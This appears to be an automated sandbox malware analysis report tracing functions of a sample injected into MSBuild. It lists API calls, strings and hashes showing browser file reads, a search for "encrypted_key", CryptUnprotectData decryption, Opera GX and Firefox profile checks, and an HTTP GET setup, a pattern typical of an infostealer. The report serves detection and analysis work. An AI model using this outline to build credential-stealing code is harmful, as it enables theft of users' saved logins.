Opcode Fuzzy Hash: d594ebf37586e0727eba3e8eb50fd5e32515ea22ef465c73045e54e17348c99c
Instruction Fuzzy Hash: 31F049B5600208BFE710ABA0EC49EAB7BBDEB48755F002158FA05E6280D6B099008BE0

Function 00406FD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(00E4EDC8,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,0040B90C,00E593C8), ref: 00406FE6

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 0040F8A0: lstrlenA.KERNEL32(004176BE,?,00000000,?,00416587,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 0040F8AB
Part of subcall function 0040F8A0: lstrcpyA.KERNEL32(00000000,004176BE), ref: 0040F8E2

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,00E4EEA8,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

SetEnvironmentVariableA.KERNEL32(00E4EDC8,00000000,00000000,?,00423404,?,0040B90C,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,004201E9), ref: 0040704F
LoadLibraryA.KERNEL32(00E59BD0,?,?,?,?,?,?,?,0040B90C,00E593C8), ref: 00407064

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00406FE0, 00406FF9

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-3463377506
Opcode ID: 153a59643373ad953a9b1375373b88862291436906786ae9e59a005ac368b341
Instruction ID: 3674f494c0927660592f126ebe4d752a07d6e352543a463b58e450960cf84051
Opcode Fuzzy Hash: 153a59643373ad953a9b1375373b88862291436906786ae9e59a005ac368b341
Instruction Fuzzy Hash: 0041A471A049049FC724FFE5EC45AAA33BAEB44304F04953EE401672E1DFB8690ACF96

Function 004142A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100sleepsynchronizationthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8,?,=OA,?,?,00000000), ref: 00414345
CreateThread.KERNEL32(00000000,00000000,004130F0,?,00000000,00000000), ref: 0041438D
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00414399

Strings

=OA, xrefs: 00414317, 004143E6, 0041431A

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleSleepThreadWait
String ID: =OA
API String ID: 4198075804-2781383965
Opcode ID: cc271842d029b86fb39d1d846deebb3d4296266582d11a6ea1b6c9d8d0dbe55f
Instruction ID: c815e327a45929293fb115344fed98bb65589d785c8a70cda2a6ba11b763288e
Opcode Fuzzy Hash: cc271842d029b86fb39d1d846deebb3d4296266582d11a6ea1b6c9d8d0dbe55f
Instruction Fuzzy Hash: D6416E729102089BDB24FFA1DC42BED7779AF54304F54903EF902765D2DB386A49CBA8

Function 00411280 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,?,00412B26,?), ref: 004112A0
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,00412B26,?), ref: 004112CB
CloseHandle.KERNEL32(00000000,?,?,00412B26,?), ref: 004112D6

Strings

&+A, xrefs: 00411297, 004112AD, 004112DC

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: &+A
API String ID: 1065093856-3022679855
Opcode ID: e5b192d5b7a298d05ce5f2ae07f8f396dfdf33a0d21f00f1cb426f39e4b2f259
Instruction ID: e3584a1bd73763bab08ea096363b5fafa1b3dc09f005f439864d535dca2b5911
Opcode Fuzzy Hash: e5b192d5b7a298d05ce5f2ae07f8f396dfdf33a0d21f00f1cb426f39e4b2f259
Instruction Fuzzy Hash: 6FF08C316402187ADA20EF61EC07FEA376CDB01760F00526AFA09A65D0DBB06D4586E8

Function 0040B180 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 157stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00406C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,0040BA32,?,00000000,?,00000000,00000000), ref: 00406C3F
Part of subcall function 00406C20: GetFileSizeEx.KERNEL32(00000000,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C55
Part of subcall function 00406C20: LocalAlloc.KERNEL32(00000040,?,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C70
Part of subcall function 00406C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C89
Part of subcall function 00406C20: CloseHandle.KERNEL32(00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CB1

Part of subcall function 00410DA0: LocalAlloc.KERNEL32(00000040,?,?,00000000,00000030,?,00413026,00000000,00000000), ref: 00410DBC

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,00E4EEA8,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00423544,004201E9), ref: 0040B224
lstrlenA.KERNEL32(00000000), ref: 0040B240

Strings

moz-extension+++, xrefs: 0040B275
^userContextId=4294967295, xrefs: 0040B267

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 161838763-3310892237
Opcode ID: f88daf6cd34f998f53300553b90af4b4732da832f8725f476e698a7f0ff8aae1
Instruction ID: bbf64b21a70ba96c4e7d34df4571fb99f0a9ed04e141873abf1496de80f97976
Opcode Fuzzy Hash: f88daf6cd34f998f53300553b90af4b4732da832f8725f476e698a7f0ff8aae1
Instruction Fuzzy Hash: B951FD729101186BDB24FB71DD529ED7378AF54704F44813EF806729D2EF386A0CCAA9

Function 004130F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000), ref: 00413120
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004131CD

Strings

ERROR, xrefs: 004131BF

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: ERROR
API String ID: 1659193697-2861137601
Opcode ID: 5e05ecdb6c26ed9a6e957027fe5ab655656de1d93edc8c9e048986cd7d1452b1
Instruction ID: fa0f609c73550b9905e9a4c97c517d243e9d7e9da07ba45fb7ad886b791ba49f
Opcode Fuzzy Hash: 5e05ecdb6c26ed9a6e957027fe5ab655656de1d93edc8c9e048986cd7d1452b1
Instruction Fuzzy Hash: 03315072A00204ABCB10FF65D846BDE7B78EB44754F10813EF915A76C1DB38A649CBD9

Function 0040BE30 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 00406C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,0040BA32,?,00000000,?,00000000,00000000), ref: 00406C3F
Part of subcall function 00406C20: GetFileSizeEx.KERNEL32(00000000,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C55
Part of subcall function 00406C20: LocalAlloc.KERNEL32(00000040,?,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C70
Part of subcall function 00406C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C89
Part of subcall function 00406C20: CloseHandle.KERNEL32(00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CB1

Part of subcall function 00410DA0: LocalAlloc.KERNEL32(00000040,?,?,00000000,00000030,?,00413026,00000000,00000000), ref: 00410DBC

StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,?,?,?,?,?,0040EC99,?), ref: 0040BE7D

Part of subcall function 00406CD0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,bb@,00000000,00000000), ref: 00406CF7
Part of subcall function 00406CD0: LocalAlloc.KERNEL32(00000040,00000000,?,00406262,00000000,?,?,?,?,?,?,?,?,00000030), ref: 00406D06
Part of subcall function 00406CD0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,bb@,00000000,00000000), ref: 00406D1D
Part of subcall function 00406CD0: LocalFree.KERNEL32(?,?,00406262,00000000,?,?,?,?,?,?,?,?,00000030), ref: 00406D2C

Part of subcall function 00406D50: CryptUnprotectData.CRYPT32(0040EC94,00000000,00000000,00000000,00000000,00000000,?), ref: 00406D75
Part of subcall function 00406D50: LocalAlloc.KERNEL32(00000040,?,00000000), ref: 00406D8D
Part of subcall function 00406D50: LocalFree.KERNEL32(?), ref: 00406DAE

Strings

"encrypted_key":", xrefs: 0040BE77
, xrefs: 0040BEE1

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"
API String ID: 2311102621-1472317035
Opcode ID: 293bcc545a7c97fa154707335477757383488077f219945ae8550d019360ae5d
Instruction ID: a7abf6cd44106865342de8c1123d42a84d3c3a1b941403826e444eadc47bdcfc
Opcode Fuzzy Hash: 293bcc545a7c97fa154707335477757383488077f219945ae8550d019360ae5d
Instruction Fuzzy Hash: E52184B6A101096BDB14EBB5DC41AEF777DDB40304F44417AF901B32D6EB38DA448AE8

Function 6C563060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C563095

Part of subcall function 6C5635A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C5EF688,00001000), ref: 6C5635D5
Part of subcall function 6C5635A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C5635E0
Part of subcall function 6C5635A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C5635FD
Part of subcall function 6C5635A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C56363F
Part of subcall function 6C5635A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C56369F
Part of subcall function 6C5635A0: __aulldiv.LIBCMT ref: 6C5636E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C56309F

Part of subcall function 6C585B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C5856EE,?,00000001), ref: 6C585B85
Part of subcall function 6C585B50: EnterCriticalSection.KERNEL32(6C5EF688,?,?,?,6C5856EE,?,00000001), ref: 6C585B90
Part of subcall function 6C585B50: LeaveCriticalSection.KERNEL32(6C5EF688,?,?,?,6C5856EE,?,00000001), ref: 6C585BD8
Part of subcall function 6C585B50: GetTickCount64.KERNEL32 ref: 6C585BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C5630BE

Part of subcall function 6C5630F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C563127
Part of subcall function 6C5630F0: __aulldiv.LIBCMT ref: 6C563140

Part of subcall function 6C59AB2A: __onexit.LIBCMT ref: 6C59AB30

Memory Dump Source

Source File: 00000001.00000002.2458707840.000000006C561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C560000, based on PE: true

Associated: 00000001.00000002.2458628586.000000006C560000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2459852233.000000006C5DD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2460006367.000000006C5EE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2460057313.000000006C5F2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c560000_MSBuild.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: a0c090a870a51920468157a54fed5ca8908af067233134dbf59e275ad85b4424
Instruction ID: 6af683cd2b3b865d7b5aba0b84225e65bb5a36e6504f94e68832e90846dae1ab
Opcode Fuzzy Hash: a0c090a870a51920468157a54fed5ca8908af067233134dbf59e275ad85b4424
Instruction Fuzzy Hash: 18F0F932E20744D7CB50DF749C412EA7370AFEF214F521719E88563621FF2066D8838A

Function 00411090 Relevance: 4.5, APIs: 3, Instructions: 30COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 004110A5
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 004110C0
CloseHandle.KERNEL32(00000000), ref: 004110C7

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 0f1bc23e815b81b4786d6a784a5d38f8ed6f0927a21d61c4d8cf93b73736ffa8
Instruction ID: 1c08e919c02a254b4b37d860c04ab18dc4e81f8fecafc94af7ba70b0d8b08a1d
Opcode Fuzzy Hash: 0f1bc23e815b81b4786d6a784a5d38f8ed6f0927a21d61c4d8cf93b73736ffa8
Instruction Fuzzy Hash: 56F06576A016286BDB20AB589C46FDE776CEF04B14F005195FF08A7290DBB46D848BD9

Function 0040D000 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 349COMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

StrCmpCA.SHLWAPI(00000000,Opera GX,004201E9,004201E9,?), ref: 0040D037

Part of subcall function 00410D50: SHGetFolderPathA.SHELL32(00000000,004201E9,00000000,00000000,?,00000000,?), ref: 00410D81

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,00E4EEA8,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00410D10: GetFileAttributesA.KERNEL32(00000000,?,?,0040B844,?,00000000,?,00000000,004201E9,004201E9), ref: 00410D1D

Strings

Opera GX, xrefs: 0040D023

Memory Dump Source

Source File: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2379793431.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000062A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2379793431.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
String ID: Opera GX
API String ID: 1719890681-3280151751
Opcode ID: d95854b7e4f582e02509d12bc3a0b86c8b795a9fc1806df68afd84cbf18b1b31
Instruction ID: 878ea3d55aa325650e3ef9eb940674a8195e6d8f65bb4788ec79313c0214d067
Opcode Fuzzy Hash: d95854b7e4f582e02509d12bc3a0b86c8b795a9fc1806df68afd84cbf18b1b31
Instruction Fuzzy Hash: 2AD11F72910108ABCB14FBA1D952DEE7778AF54304F50813EF806765D2EB38AA0CCAA5

Function 00412EE0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00405010: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405062
Part of subcall function 00405010: StrCmpCA.SHLWAPI(?,00E59ED8,?,?,?,?,?,?,?), ref: 0040507A
Part of subcall function 00405010: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004050A2
Part of subcall function 00405010: HttpOpenRequestA.WININET(00000000,GET,?,00E5ADC8,00000000,00000000,-00400100,00000000), ref: 004050DC
